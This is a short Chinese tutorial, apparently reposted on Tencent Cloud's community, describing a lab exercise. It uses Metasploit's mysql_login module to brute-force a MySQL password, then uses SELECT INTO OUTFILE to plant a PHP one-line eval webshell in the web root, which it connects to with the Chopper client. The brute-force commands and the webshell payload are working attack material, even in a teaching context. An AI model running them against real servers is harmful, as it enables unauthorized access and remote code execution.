前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >linux渗透测试Metasploit模块(暴力破解数据库密码)

linux渗透测试Metasploit模块(暴力破解数据库密码)

作者头像
用户9282069
发布2021-12-13 16:57:57
8750
发布2021-12-13 16:57:57
举报
文章被收录于专栏:timu1

前言

学习内容:通过Metasploit暴力破解数据库密码,并在数据库中写入一句话木马。

渗透机:172.16.5.196 含有字典2.txt

靶机:172.16.5.192 安装了mysql vsftpd服务

要保证渗透机与靶机要ping的通

1.输入msfconsole启动Metasploit,使用/auxiliary/scanner/mysql/mysql_login

use /auxiliary/scanner/mysql/mysql_login

2.设置目标IP地址,用户名与字典路径,这里我将字典2.txt放在了/root路径下,实际操作要根据自身的路径来设置,当然如果你没有字典肯定是做不了的

设置好后输入run运行模块

最后等待它跑完字典后数据库的用户名密码就出来了

3.远程登录靶机的数据库

mysql -h 172.16.5.192 -u root -paababb

use mysql; 使用mysql数据库

select '<?php @eval ($_POST["123456"])?>' into outfile '/var/www/html/shell.php'; 写入一句话木马

成功后就可以上菜刀了,右键添加shell,最后双击添加的shell就可以连接上写入的木马了

本文系转载,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文系转载前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档